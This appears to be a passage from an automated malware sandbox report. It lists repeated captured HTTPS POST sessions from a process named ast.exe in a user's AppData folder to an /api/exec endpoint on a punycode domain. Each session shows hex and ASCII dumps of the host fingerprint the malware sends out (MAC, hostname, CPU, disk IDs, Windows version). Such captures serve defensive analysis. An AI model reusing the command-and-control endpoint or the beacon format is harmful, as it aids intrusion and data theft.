                                                                                                                                          1M1C-F4-BB-57-0D-C9HS53687091200HVdltngbmumrhtHN6ZKEEMVDCP0008-06F8-0000-0000-0000-0000 : Intel(R) Core(TM)2 CPU 6600 @ 2.40 GHzHN006002c296b8597ff74a7a66f4011f385HS05368709120064.5-1927990/Microsoft Windows 10 Pro (10.0.19045) x64


                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                          34192.168.2.550103212.193.169.654433380C:\Users\user\AppData\Roaming\template\ast.exe
                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                          2024-11-19 17:57:48 UTC134OUTPOST https://id.xn--80akicokc0aablc.xn--p1ai:443/api/exec HTTP/1.1
                                                                                                                                          Host: id.xn--80akicokc0aablc.xn--p1ai:443
                                                                                                                                          Content-Length: 269
                                                                                                                                          2024-11-19 17:57:48 UTC269OUTData Raw: 01 31 00 00 0d 01 00 00 00 00 00 00 bf 00 00 00 4d 02 31 43 2d 46 34 2d 42 42 2d 35 37 2d 30 44 2d 43 39 01 03 48 53 02 35 33 36 38 37 30 39 31 32 30 30 03 48 56 02 64 6c 74 6e 67 62 6d 75 6d 72 68 74 03 48 4e 02 36 5a 4b 45 45 4d 56 44 03 43 50 02 30 30 30 38 2d 30 36 46 38 2d 30 30 30 30 2d 30 30 30 30 2d 30 30 30 30 2d 30 30 30 30 20 3a 20 49 6e 74 65 6c 28 52 29 20 43 6f 72 65 28 54 4d 29 32 20 43 50 55 20 36 36 30 30 20 40 20 32 2e 34 30 20 47 48 7a 03 48 4e 30 02 30 36 30 30 32 63 32 39 36 62 38 35 39 37 66 66 37 34 61 37 61 36 36 66 34 30 31 31 66 33 38 35 03 48 53 30 02 35 33 36 38 37 30 39 31 32 30 30 03 36 00 00 00 34 2e 35 2d 31 39 32 37 39 39 01 30 2f 4d 69 63 72 6f 73 6f 66 74 20 57 69 6e 64 6f 77 73 20 31 30 20 50 72 6f 20 28 31 30 2e 30 2e
                                                                                                                                          Data Ascii: 1M1C-F4-BB-57-0D-C9HS53687091200HVdltngbmumrhtHN6ZKEEMVDCP0008-06F8-0000-0000-0000-0000 : Intel(R) Core(TM)2 CPU 6600 @ 2.40 GHzHN006002c296b8597ff74a7a66f4011f385HS05368709120064.5-1927990/Microsoft Windows 10 Pro (10.0.


                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                          35192.168.2.550106212.193.169.654433380C:\Users\user\AppData\Roaming\template\ast.exe
                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                          2024-11-19 17:57:49 UTC134OUTPOST https://id.xn--80akicokc0aablc.xn--p1ai:443/api/exec HTTP/1.1
                                                                                                                                          Host: id.xn--80akicokc0aablc.xn--p1ai:443
                                                                                                                                          Content-Length: 269
                                                                                                                                          2024-11-19 17:57:49 UTC269OUTData Raw: 01 31 00 00 0d 01 00 00 00 00 00 00 bf 00 00 00 4d 02 31 43 2d 46 34 2d 42 42 2d 35 37 2d 30 44 2d 43 39 01 03 48 53 02 35 33 36 38 37 30 39 31 32 30 30 03 48 56 02 64 6c 74 6e 67 62 6d 75 6d 72 68 74 03 48 4e 02 36 5a 4b 45 45 4d 56 44 03 43 50 02 30 30 30 38 2d 30 36 46 38 2d 30 30 30 30 2d 30 30 30 30 2d 30 30 30 30 2d 30 30 30 30 20 3a 20 49 6e 74 65 6c 28 52 29 20 43 6f 72 65 28 54 4d 29 32 20 43 50 55 20 36 36 30 30 20 40 20 32 2e 34 30 20 47 48 7a 03 48 4e 30 02 30 36 30 30 32 63 32 39 36 62 38 35 39 37 66 66 37 34 61 37 61 36 36 66 34 30 31 31 66 33 38 35 03 48 53 30 02 35 33 36 38 37 30 39 31 32 30 30 03 36 00 00 00 34 2e 35 2d 31 39 32 37 39 39 01 30 2f 4d 69 63 72 6f 73 6f 66 74 20 57 69 6e 64 6f 77 73 20 31 30 20 50 72 6f 20 28 31 30 2e 30 2e
                                                                                                                                          Data Ascii: 1M1C-F4-BB-57-0D-C9HS53687091200HVdltngbmumrhtHN6ZKEEMVDCP0008-06F8-0000-0000-0000-0000 : Intel(R) Core(TM)2 CPU 6600 @ 2.40 GHzHN006002c296b8597ff74a7a66f4011f385HS05368709120064.5-1927990/Microsoft Windows 10 Pro (10.0.


                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                          36192.168.2.550109212.193.169.654433380C:\Users\user\AppData\Roaming\template\ast.exe
                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                          2024-11-19 17:57:50 UTC134OUTPOST https://id.xn--80akicokc0aablc.xn--p1ai:443/api/exec HTTP/1.1
                                                                                                                                          Host: id.xn--80akicokc0aablc.xn--p1ai:443
                                                                                                                                          Content-Length: 269
                                                                                                                                          2024-11-19 17:57:50 UTC269OUTData Raw: 01 31 00 00 0d 01 00 00 00 00 00 00 bf 00 00 00 4d 02 31 43 2d 46 34 2d 42 42 2d 35 37 2d 30 44 2d 43 39 01 03 48 53 02 35 33 36 38 37 30 39 31 32 30 30 03 48 56 02 64 6c 74 6e 67 62 6d 75 6d 72 68 74 03 48 4e 02 36 5a 4b 45 45 4d 56 44 03 43 50 02 30 30 30 38 2d 30 36 46 38 2d 30 30 30 30 2d 30 30 30 30 2d 30 30 30 30 2d 30 30 30 30 20 3a 20 49 6e 74 65 6c 28 52 29 20 43 6f 72 65 28 54 4d 29 32 20 43 50 55 20 36 36 30 30 20 40 20 32 2e 34 30 20 47 48 7a 03 48 4e 30 02 30 36 30 30 32 63 32 39 36 62 38 35 39 37 66 66 37 34 61 37 61 36 36 66 34 30 31 31 66 33 38 35 03 48 53 30 02 35 33 36 38 37 30 39 31 32 30 30 03 36 00 00 00 34 2e 35 2d 31 39 32 37 39 39 01 30 2f 4d 69 63 72 6f 73 6f 66 74 20 57 69 6e 64 6f 77 73 20 31 30 20 50 72 6f 20 28 31 30 2e 30 2e
                                                                                                                                          Data Ascii: 1M1C-F4-BB-57-0D-C9HS53687091200HVdltngbmumrhtHN6ZKEEMVDCP0008-06F8-0000-0000-0000-0000 : Intel(R) Core(TM)2 CPU 6600 @ 2.40 GHzHN006002c296b8597ff74a7a66f4011f385HS05368709120064.5-1927990/Microsoft Windows 10 Pro (10.0.


                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                          37192.168.2.550112212.193.169.654433380C:\Users\user\AppData\Roaming\template\ast.exe
                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                          2024-11-19 17:57:52 UTC134OUTPOST https://id.xn--80akicokc0aablc.xn--p1ai:443/api/exec HTTP/1.1
                                                                                                                                          Host: id.xn--80akicokc0aablc.xn--p1ai:443
                                                                                                                                          Content-Length: 269
                                                                                                                                          2024-11-19 17:57:52 UTC269OUTData Raw: 01 31 00 00 0d 01 00 00 00 00 00 00 bf 00 00 00 4d 02 31 43 2d 46 34 2d 42 42 2d 35 37 2d 30 44 2d 43 39 01 03 48 53 02 35 33 36 38 37 30 39 31 32 30 30 03 48 56 02 64 6c 74 6e 67 62 6d 75 6d 72 68 74 03 48 4e 02 36 5a 4b 45 45 4d 56 44 03 43 50 02 30 30 30 38 2d 30 36 46 38 2d 30 30 30 30 2d 30 30 30 30 2d 30 30 30 30 2d 30 30 30 30 20 3a 20 49 6e 74 65 6c 28 52 29 20 43 6f 72 65 28 54 4d 29 32 20 43 50 55 20 36 36 30 30 20 40 20 32 2e 34 30 20 47 48 7a 03 48 4e 30 02 30 36 30 30 32 63 32 39 36 62 38 35 39 37 66 66 37 34 61 37 61 36 36 66 34 30 31 31 66 33 38 35 03 48 53 30 02 35 33 36 38 37 30 39 31 32 30 30 03 36 00 00 00 34 2e 35 2d 31 39 32 37 39 39 01 30 2f 4d 69 63 72 6f 73 6f 66 74 20 57 69 6e 64 6f 77 73 20 31 30 20 50 72 6f 20 28 31 30 2e 30 2e
                                                                                                                                          Data Ascii: 1M1C-F4-BB-57-0D-C9HS53687091200HVdltngbmumrhtHN6ZKEEMVDCP0008-06F8-0000-0000-0000-0000 : Intel(R) Core(TM)2 CPU 6600 @ 2.40 GHzHN006002c296b8597ff74a7a66f4011f385HS05368709120064.5-1927990/Microsoft Windows 10 Pro (10.0.


                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                          38192.168.2.550115212.193.169.654433380C:\Users\user\AppData\Roaming\template\ast.exe
                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                          2024-11-19 17:57:53 UTC134OUTPOST https://id.xn--80akicokc0aablc.xn--p1ai:443/api/exec HTTP/1.1
                                                                                                                                          Host: id.xn--80akicokc0aablc.xn--p1ai:443
                                                                                                                                          Content-Length: 269
                                                                                                                                          2024-11-19 17:57:53 UTC269OUTData Raw: 01 31 00 00 0d 01 00 00 00 00 00 00 bf 00 00 00 4d 02 31 43 2d 46 34 2d 42 42 2d 35 37 2d 30 44 2d 43 39 01 03 48 53 02 35 33 36 38 37 30 39 31 32 30 30 03 48 56 02 64 6c 74 6e 67 62 6d 75 6d 72 68 74 03 48 4e 02 36 5a 4b 45 45 4d 56 44 03 43 50 02 30 30 30 38 2d 30 36 46 38 2d 30 30 30 30 2d 30 30 30 30 2d 30 30 30 30 2d 30 30 30 30 20 3a 20 49 6e 74 65 6c 28 52 29 20 43 6f 72 65 28 54 4d 29 32 20 43 50 55 20 36 36 30 30 20 40 20 32 2e 34 30 20 47 48 7a 03 48 4e 30 02 30 36 30 30 32 63 32 39 36 62 38 35 39 37 66 66 37 34 61 37 61 36 36 66 34 30 31 31 66 33 38 35 03 48 53 30 02 35 33 36 38 37 30 39 31 32 30 30 03 36 00 00 00 34 2e 35 2d 31 39 32 37 39 39 01 30 2f 4d 69 63 72 6f 73 6f 66 74 20 57 69 6e 64 6f 77 73 20 31 30 20 50 72 6f 20 28 31 30 2e 30 2e
                                                                                                                                          Data Ascii: 1M1C-F4-BB-57-0D-C9HS53687091200HVdltngbmumrhtHN6ZKEEMVDCP0008-06F8-0000-0000-0000-0000 : Intel(R) Core(TM)2 CPU 6600 @ 2.40 GHzHN006002c296b8597ff74a7a66f4011f385HS05368709120064.5-1927990/Microsoft Windows 10 Pro (10.0.


                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                          39192.168.2.550118212.193.169.654433380C:\Users\user\AppData\Roaming\template\ast.exe
                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                          2024-11-19 17:57:54 UTC134OUTPOST https://id.xn--80akicokc0aablc.xn--p1ai:443/api/exec HTTP/1.1
                                                                                                                                          Host: id.xn--80akicokc0aablc.xn--p1ai:443
                                                                                                                                          Content-Length: 269
                                                                                                                                          2024-11-19 17:57:54 UTC269OUTData Raw: 01 31 00 00 0d 01 00 00 00 00 00 00 bf 00 00 00 4d 02 31 43 2d 46 34 2d 42 42 2d 35 37 2d 30 44 2d 43 39 01 03 48 53 02 35 33 36 38 37 30 39 31 32 30 30 03 48 56 02 64 6c 74 6e 67 62 6d 75 6d 72 68 74 03 48 4e 02 36 5a 4b 45 45 4d 56 44 03 43 50 02 30 30 30 38 2d 30 36 46 38 2d 30 30 30 30 2d 30 30 30 30 2d 30 30 30 30 2d 30 30 30 30 20 3a 20 49 6e 74 65 6c 28 52 29 20 43 6f 72 65 28 54 4d 29 32 20 43 50 55 20 36 36 30 30 20 40 20 32 2e 34 30 20 47 48 7a 03 48 4e 30 02 30 36 30 30 32 63 32 39 36 62 38 35 39 37 66 66 37 34 61 37 61 36 36 66 34 30 31 31 66 33 38 35 03 48 53 30 02 35 33 36 38 37 30 39 31 32 30 30 03 36 00 00 00 34 2e 35 2d 31 39 32 37 39 39 01 30 2f 4d 69 63 72 6f 73 6f 66 74 20 57 69 6e 64 6f 77 73 20 31 30 20 50 72 6f 20 28 31 30 2e 30 2e
                                                                                                                                          Data Ascii: 1M1C-F4-BB-57-0D-C9HS53687091200HVdltngbmumrhtHN6ZKEEMVDCP0008-06F8-0000-0000-0000-0000 : Intel(R) Core(TM)2 CPU 6600 @ 2.40 GHzHN006002c296b8597ff74a7a66f4011f385HS05368709120064.5-1927990/Microsoft Windows 10 Pro (10.0.


                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                          40192.168.2.550121212.193.169.654433380C:\Users\user\AppData\Roaming\template\ast.exe
                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                          2024-11-19 17:57:55 UTC134OUTPOST https://id.xn--80akicokc0aablc.xn--p1ai:443/api/exec HTTP/1.1
                                                                                                                                          Host: id.xn--80akicokc0aablc.xn--p1ai:443
                                                                                                                                          Content-Length: 269
                                                                                                                                          2024-11-19 17:57:55 UTC269OUTData Raw: 01 31 00 00 0d 01 00 00 00 00 00 00 bf 00 00 00 4d 02 31 43 2d 46 34 2d 42 42 2d 35 37 2d 30 44 2d 43 39 01 03 48 53 02 35 33 36 38 37 30 39 31 32 30 30 03 48 56 02 64 6c 74 6e 67 62 6d 75 6d 72 68 74 03 48 4e 02 36 5a 4b 45 45 4d 56 44 03 43 50 02 30 30 30 38 2d 30 36 46 38 2d 30 30 30 30 2d 30 30 30 30 2d 30 30 30 30 2d 30 30 30 30 20 3a 20 49 6e 74 65 6c 28 52 29 20 43 6f 72 65 28 54 4d 29 32 20 43 50 55 20 36 36 30 30 20 40 20 32 2e 34 30 20 47 48 7a 03 48 4e 30 02 30 36 30 30 32 63 32 39 36 62 38 35 39 37 66 66 37 34 61 37 61 36 36 66 34 30 31 31 66 33 38 35 03 48 53 30 02 35 33 36 38 37 30 39 31 32 30 30 03 36 00 00 00 34 2e 35 2d 31 39 32 37 39 39 01 30 2f 4d 69 63 72 6f 73 6f 66 74 20 57 69 6e 64 6f 77 73 20 31 30 20 50 72 6f 20 28 31 30 2e 30 2e
                                                                                                                                          Data Ascii: 1M1C-F4-BB-57-0D-C9HS53687091200HVdltngbmumrhtHN6ZKEEMVDCP0008-06F8-0000-0000-0000-0000 : Intel(R) Core(TM)2 CPU 6600 @ 2.40 GHzHN006002c296b8597ff74a7a66f4011f385HS05368709120064.5-1927990/Microsoft Windows 10 Pro (10.0.


                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                          41192.168.2.550124212.193.169.654433380C:\Users\user\AppData\Roaming\template\ast.exe
                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                          2024-11-19 17:57:55 UTC134OUTPOST https://id.xn--80akicokc0aablc.xn--p1ai:443/api/exec HTTP/1.1
                                                                                                                                          Host: id.xn--80akicokc0aablc.xn--p1ai:443
                                                                                                                                          Content-Length: 269
                                                                                                                                          2024-11-19 17:57:55 UTC269OUTData Raw: 01 31 00 00 0d 01 00 00 00 00 00 00 bf 00 00 00 4d 02 31 43 2d 46 34 2d 42 42 2d 35 37 2d 30 44 2d 43 39 01 03 48 53 02 35 33 36 38 37 30 39 31 32 30 30 03 48 56 02 64 6c 74 6e 67 62 6d 75 6d 72 68 74 03 48 4e 02 36 5a 4b 45 45 4d 56 44 03 43 50 02 30 30 30 38 2d 30 36 46 38 2d 30 30 30 30 2d 30 30 30 30 2d 30 30 30 30 2d 30 30 30 30 20 3a 20 49 6e 74 65 6c 28 52 29 20 43 6f 72 65 28 54 4d 29 32 20 43 50 55 20 36 36 30 30 20 40 20 32 2e 34 30 20 47 48 7a 03 48 4e 30 02 30 36 30 30 32 63 32 39 36 62 38 35 39 37 66 66 37 34 61 37 61 36 36 66 34 30 31 31 66 33 38 35 03 48 53 30 02 35 33 36 38 37 30 39 31 32 30 30 03 36 00 00 00 34 2e 35 2d 31 39 32 37 39 39 01 30 2f 4d 69 63 72 6f 73 6f 66 74 20 57 69 6e 64 6f 77 73 20 31 30 20 50 72 6f 20 28 31 30 2e 30 2e
                                                                                                                                          Data Ascii: 1M1C-F4-BB-57-0D-C9HS53687091200HVdltngbmumrhtHN6ZKEEMVDCP0008-06F8-0000-0000-0000-0000 : Intel(R) Core(TM)2 CPU 6600 @ 2.40 GHzHN006002c296b8597ff74a7a66f4011f385HS05368709120064.5-1927990/Microsoft Windows 10 Pro (10.0.


                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                          42192.168.2.550127212.193.169.654433380C:\Users\user\AppData\Roaming\template\ast.exe
                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                          2024-11-19 17:57:56 UTC134OUTPOST https://id.xn--80akicokc0aablc.xn--p1ai:443/api/exec HTTP/1.1
                                                                                                                                          Host: id.xn--80akicokc0aablc.xn--p1ai:443
                                                                                                                                          Content-Length: 269
                                                                                                                                          2024-11-19 17:57:56 UTC269OUTData Raw: 01 31 00 00 0d 01 00 00 00 00 00 00 bf 00 00 00 4d 02 31 43 2d 46 34 2d 42 42 2d 35 37 2d 30 44 2d 43 39 01 03 48 53 02 35 33 36 38 37 30 39 31 32 30 30 03 48 56 02 64 6c 74 6e 67 62 6d 75 6d 72 68 74 03 48 4e 02 36 5a 4b 45 45 4d 56 44 03 43 50 02 30 30 30 38 2d 30 36 46 38 2d 30 30 30 30 2d 30 30 30 30 2d 30 30 30 30 2d 30 30 30 30 20 3a 20 49 6e 74 65 6c 28 52 29 20 43 6f 72 65 28 54 4d 29 32 20 43 50 55 20 36 36 30 30 20 40 20 32 2e 34 30 20 47 48 7a 03 48 4e 30 02 30 36 30 30 32 63 32 39 36 62 38 35 39 37 66 66 37 34 61 37 61 36 36 66 34 30 31 31 66 33 38 35 03 48 53 30 02 35 33 36 38 37 30 39 31 32 30 30 03 36 00 00 00 34 2e 35 2d 31 39 32 37 39 39 01 30 2f 4d 69 63 72 6f 73 6f 66 74 20 57 69 6e 64 6f 77 73 20 31 30 20 50 72 6f 20 28 31 30 2e 30 2e
                                                                                                                                          Data Ascii: 1M1C-F4-BB-57-0D-C9HS53687091200HVdltngbmumrhtHN6ZKEEMVDCP0008-06F8-0000-0000-0000-0000 : Intel(R) Core(TM)2 CPU 6600 @ 2.40 GHzHN006002c296b8597ff74a7a66f4011f385HS05368709120064.5-1927990/Microsoft Windows 10 Pro (10.0.


                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                          43192.168.2.550133212.193.169.654433380C:\Users\user\AppData\Roaming\template\ast.exe
                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                          2024-11-19 17:57:58 UTC134OUTPOST https://id.xn--80akicokc0aablc.xn--p1ai:443/api/exec HTTP/1.1
                                                                                                                                          Host: id.xn--80akicokc0aablc.xn--p1ai:443
                                                                                                                                          Content-Length: 269
                                                                                                                                          2024-11-19 17:57:58 UTC269OUTData Raw: 01 31 00 00 0d 01 00 00 00 00 00 00 bf 00 00 00 4d 02 31 43 2d 46 34 2d 42 42 2d 35 37 2d 30 44 2d 43 39 01 03 48 53 02 35 33 36 38 37 30 39 31 32 30 30 03 48 56 02 64 6c 74 6e 67 62 6d 75 6d 72 68 74 03 48 4e 02 36 5a 4b 45 45 4d 56 44 03 43 50 02 30 30 30 38 2d 30 36 46 38 2d 30 30 30 30 2d 30 30 30 30 2d 30 30 30 30 2d 30 30 30 30 20 3a 20 49 6e 74 65 6c 28 52 29 20 43 6f 72 65 28 54 4d 29 32 20 43 50 55 20 36 36 30 30 20 40 20 32 2e 34 30 20 47 48 7a 03 48 4e 30 02 30 36 30 30 32 63 32 39 36 62 38 35 39 37 66 66 37 34 61 37 61 36 36 66 34 30 31 31 66 33 38 35 03 48 53 30 02 35 33 36 38 37 30 39 31 32 30 30 03 36 00 00 00 34 2e 35 2d 31 39 32 37 39 39 01 30 2f 4d 69 63 72 6f 73 6f 66 74 20 57 69 6e 64 6f 77 73 20 31 30 20 50 72 6f 20 28 31 30 2e 30 2e
                                                                                                                                          Data Ascii: 1M1C-F4-BB-57-0D-C9HS53687091200HVdltngbmumrhtHN6ZKEEMVDCP0008-06F8-0000-0000-0000-0000 : Intel(R) Core(TM)2 CPU 6600 @ 2.40 GHzHN006002c296b8597ff74a7a66f4011f385HS05368709120064.5-1927990/Microsoft Windows 10 Pro (10.0.


                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                          44192.168.2.550139212.193.169.654433380C:\Users\user\AppData\Roaming\template\ast.exe
                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                          2024-11-19 17:58:00 UTC134OUTPOST https://id.xn--80akicokc0aablc.xn--p1ai:443/api/exec HTTP/1.1
                                                                                                                                          Host: id.xn--80akicokc0aablc.xn--p1ai:443
                                                                                                                                          Content-Length: 269
                                                                                                                                          2024-11-19 17:58:00 UTC269OUTData Raw: 01 31 00 00 0d 01 00 00 00 00 00 00 bf 00 00 00 4d 02 31 43 2d 46 34 2d 42 42 2d 35 37 2d 30 44 2d 43 39 01 03 48 53 02 35 33 36 38 37 30 39 31 32 30 30 03 48 56 02 64 6c 74 6e 67 62 6d 75 6d 72 68 74 03 48 4e 02 36 5a 4b 45 45 4d 56 44 03 43 50 02 30 30 30 38 2d 30 36 46 38 2d 30 30 30 30 2d 30 30 30 30 2d 30 30 30 30 2d 30 30 30 30 20 3a 20 49 6e 74 65 6c 28 52 29 20 43 6f 72 65 28 54 4d 29 32 20 43 50 55 20 36 36 30 30 20 40 20 32 2e 34 30 20 47 48 7a 03 48 4e 30 02 30 36 30 30 32 63 32 39 36 62 38 35 39 37 66 66 37 34 61 37 61 36 36 66 34 30 31 31 66 33 38 35 03 48 53 30 02 35 33 36 38 37 30 39 31 32 30 30 03 36 00 00 00 34 2e 35 2d 31 39 32 37 39 39 01 30 2f 4d 69 63 72 6f 73 6f 66 74 20 57 69 6e 64 6f 77 73 20 31 30 20 50 72 6f 20 28 31 30 2e 30 2e
                                                                                                                                          Data Ascii: 1M1C-F4-BB-57-0D-C9HS53687091200HVdltngbmumrhtHN6ZKEEMVDCP0008-06F8-0000-0000-0000-0000 : Intel(R) Core(TM)2 CPU 6600 @ 2.40 GHzHN006002c296b8597ff74a7a66f4011f385HS05368709120064.5-1927990/Microsoft Windows 10 Pro (10.0.


                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                          45192.168.2.550142212.193.169.654433380C:\Users\user\AppData\Roaming\template\ast.exe
                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                          2024-11-19 17:58:02 UTC134OUTPOST https://id.xn--80akicokc0aablc.xn--p1ai:443/api/exec HTTP/1.1
                                                                                                                                          Host: id.xn--80akicokc0aablc.xn--p1ai:443
                                                                                                                                          Content-Length: 269
                                                                                                                                          2024-11-19 17:58:02 UTC269OUTData Raw: 01 31 00 00 0d 01 00 00 00 00 00 00 bf 00 00 00 4d 02 31 43 2d 46 34 2d 42 42 2d 35 37 2d 30 44 2d 43 39 01 03 48 53 02 35 33 36 38 37 30 39 31 32 30 30 03 48 56 02 64 6c 74 6e 67 62 6d 75 6d 72 68 74 03 48 4e 02 36 5a 4b 45 45 4d 56 44 03 43 50 02 30 30 30 38 2d 30 36 46 38 2d 30 30 30 30 2d 30 30 30 30 2d 30 30 30 30 2d 30 30 30 30 20 3a 20 49 6e 74 65 6c 28 52 29 20 43 6f 72 65 28 54 4d 29 32 20 43 50 55 20 36 36 30 30 20 40 20 32 2e 34 30 20 47 48 7a 03 48 4e 30 02 30 36 30 30 32 63 32 39 36 62 38 35 39 37 66 66 37 34 61 37 61 36 36 66 34 30 31 31 66 33 38 35 03 48 53 30 02 35 33 36 38 37 30 39 31 32 30 30 03 36 00 00 00 34 2e 35 2d 31 39 32 37 39 39 01 30 2f 4d 69 63 72 6f 73 6f 66 74 20 57 69 6e 64 6f 77 73 20 31 30 20 50 72 6f 20 28 31 30 2e 30 2e
                                                                                                                                          Data Ascii: 1M1C-F4-BB-57-0D-C9HS53687091200HVdltngbmumrhtHN6ZKEEMVDCP0008-06F8-0000-0000-0000-0000 : Intel(R) Core(TM)2 CPU 6600 @ 2.40 GHzHN006002c296b8597ff74a7a66f4011f385HS05368709120064.5-1927990/Microsoft Windows 10 Pro (10.0.


                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                          46192.168.2.550145212.193.169.654433380C:\Users\user\AppData\Roaming\template\ast.exe
                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                          2024-11-19 17:58:02 UTC134OUTPOST https://id.xn--80akicokc0aablc.xn--p1ai:443/api/exec HTTP/1.1
                                                                                                                                          Host: id.xn--80akicokc0aablc.xn--p1ai:443
                                                                                                                                          Content-Length: 269
                                                                                                                                          2024-11-19 17:58:02 UTC269OUTData Raw: 01 31 00 00 0d 01 00 00 00 00 00 00 bf 00 00 00 4d 02 31 43 2d 46 34 2d 42 42 2d 35 37 2d 30 44 2d 43 39 01 03 48 53 02 35 33 36 38 37 30 39 31 32 30 30 03 48 56 02 64 6c 74 6e 67 62 6d 75 6d 72 68 74 03 48 4e 02 36 5a 4b 45 45 4d 56 44 03 43 50 02 30 30 30 38 2d 30 36 46 38 2d 30 30 30 30 2d 30 30 30 30 2d 30 30 30 30 2d 30 30 30 30 20 3a 20 49 6e 74 65 6c 28 52 29 20 43 6f 72 65 28 54 4d 29 32 20 43 50 55 20 36 36 30 30 20 40 20 32 2e 34 30 20 47 48 7a 03 48 4e 30 02 30 36 30 30 32 63 32 39 36 62 38 35 39 37 66 66 37 34 61 37 61 36 36 66 34 30 31 31 66 33 38 35 03 48 53 30 02 35 33 36 38 37 30 39 31 32 30 30 03 36 00 00 00 34 2e 35 2d 31 39 32 37 39 39 01 30 2f 4d 69 63 72 6f 73 6f 66 74 20 57 69 6e 64 6f 77 73 20 31 30 20 50 72 6f 20 28 31 30 2e 30 2e
                                                                                                                                          Data Ascii: 1M1C-F4-BB-57-0D-C9HS53687091200HVdltngbmumrhtHN6ZKEEMVDCP0008-06F8-0000-0000-0000-0000 : Intel(R) Core(TM)2 CPU 6600 @ 2.40 GHzHN006002c296b8597ff74a7a66f4011f385HS05368709120064.5-1927990/Microsoft Windows 10 Pro (10.0.


                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                          47192.168.2.550148212.193.169.654433380C:\Users\user\AppData\Roaming\template\ast.exe
                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                          2024-11-19 17:58:04 UTC134OUTPOST https://id.xn--80akicokc0aablc.xn--p1ai:443/api/exec HTTP/1.1
                                                                                                                                          Host: id.xn--80akicokc0aablc.xn--p1ai:443
                                                                                                                                          Content-Length: 269
                                                                                                                                          2024-11-19 17:58:04 UTC269OUTData Raw: 01 31 00 00 0d 01 00 00 00 00 00 00 bf 00 00 00 4d 02 31 43 2d 46 34 2d 42 42 2d 35 37 2d 30 44 2d 43 39 01 03 48 53 02 35 33 36 38 37 30 39 31 32 30 30 03 48 56 02 64 6c 74 6e 67 62 6d 75 6d 72 68 74 03 48 4e 02 36 5a 4b 45 45 4d 56 44 03 43 50 02 30 30 30 38 2d 30 36 46 38 2d 30 30 30 30 2d 30 30 30 30 2d 30 30 30 30 2d 30 30 30 30 20 3a 20 49 6e 74 65 6c 28 52 29 20 43 6f 72 65 28 54 4d 29 32 20 43 50 55 20 36 36 30 30 20 40 20 32 2e 34 30 20 47 48 7a 03 48 4e 30 02 30 36 30 30 32 63 32 39 36 62 38 35 39 37 66 66 37 34 61 37 61 36 36 66 34 30 31 31 66 33 38 35 03 48 53 30 02 35 33 36 38 37 30 39 31 32 30 30 03 36 00 00 00 34 2e 35 2d 31 39 32 37 39 39 01 30 2f 4d 69 63 72 6f 73 6f 66 74 20 57 69 6e 64 6f 77 73 20 31 30 20 50 72 6f 20 28 31 30 2e 30 2e
                                                                                                                                          Data Ascii: 1M1C-F4-BB-57-0D-C9HS53687091200HVdltngbmumrhtHN6ZKEEMVDCP0008-06F8-0000-0000-0000-0000 : Intel(R) Core(TM)2 CPU 6600 @ 2.40 GHzHN006002c296b8597ff74a7a66f4011f385HS05368709120064.5-1927990/Microsoft Windows 10 Pro (10.0.


                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                          48192.168.2.550151212.193.169.654433380C:\Users\user\AppData\Roaming\template\ast.exe
                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                          2024-11-19 17:58:05 UTC134OUTPOST https://id.xn--80akicokc0aablc.xn--p1ai:443/api/exec HTTP/1.1
                                                                                                                                          Host: id.xn--80akicokc0aablc.xn--p1ai:443
                                                                                                                                          Content-Length: 269
                                                                                                                                          2024-11-19 17:58:05 UTC269OUTData Raw: 01 31 00 00 0d 01 00 00 00 00 00 00 bf 00 00 00 4d 02 31 43 2d 46 34 2d 42 42 2d 35 37 2d 30 44 2d 43 39 01 03 48 53 02 35 33 36 38 37 30 39 31 32 30 30 03 48 56 02 64 6c 74 6e 67 62 6d 75 6d 72 68 74 03 48 4e 02 36 5a 4b 45 45 4d 56 44 03 43 50 02 30 30 30 38 2d 30 36 46 38 2d 30 30 30 30 2d 30 30 30 30 2d 30 30 30 30 2d 30 30 30 30 20 3a 20 49 6e 74 65 6c 28 52 29 20 43 6f 72 65 28 54 4d 29 32 20 43 50 55 20 36 36 30 30 20 40 20 32 2e 34 30 20 47 48 7a 03 48 4e 30 02 30 36 30 30 32 63 32 39 36 62 38 35 39 37 66 66 37 34 61 37 61 36 36 66 34 30 31 31 66 33 38 35 03 48 53 30 02 35 33 36 38 37 30 39 31 32 30 30 03 36 00 00 00 34 2e 35 2d 31 39 32 37 39 39 01 30 2f 4d 69 63 72 6f 73 6f 66 74 20 57 69 6e 64 6f 77 73 20 31 30 20 50 72 6f 20 28 31 30 2e 30 2e
